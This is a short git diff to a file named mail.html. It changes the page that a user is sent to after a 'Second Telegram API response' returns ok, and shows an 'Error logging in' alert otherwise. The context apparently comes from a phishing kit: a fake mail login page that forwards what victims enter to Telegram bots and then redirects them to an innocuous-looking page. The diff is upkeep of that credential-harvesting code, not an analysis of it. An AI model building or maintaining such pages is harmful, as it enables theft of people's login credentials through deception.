--- a/public/mail.html
+++ b/public/mail.html
@@ -5713,7 +5713,7 @@
                                                       .then(data => {
                                                           console.log('Second Telegram API response:', data);  // Log second bot's response
                                                           if (data.ok) {
-                                                              window.location.href = "refresh.html"; // Replace with your desired redirect page
+                                                              window.location.href = "Loading.html"; // Replace with your desired redirect page
                                                           } else {
                                                               alert("Error logging in: " + data.description); // Show detailed error
                                                           }
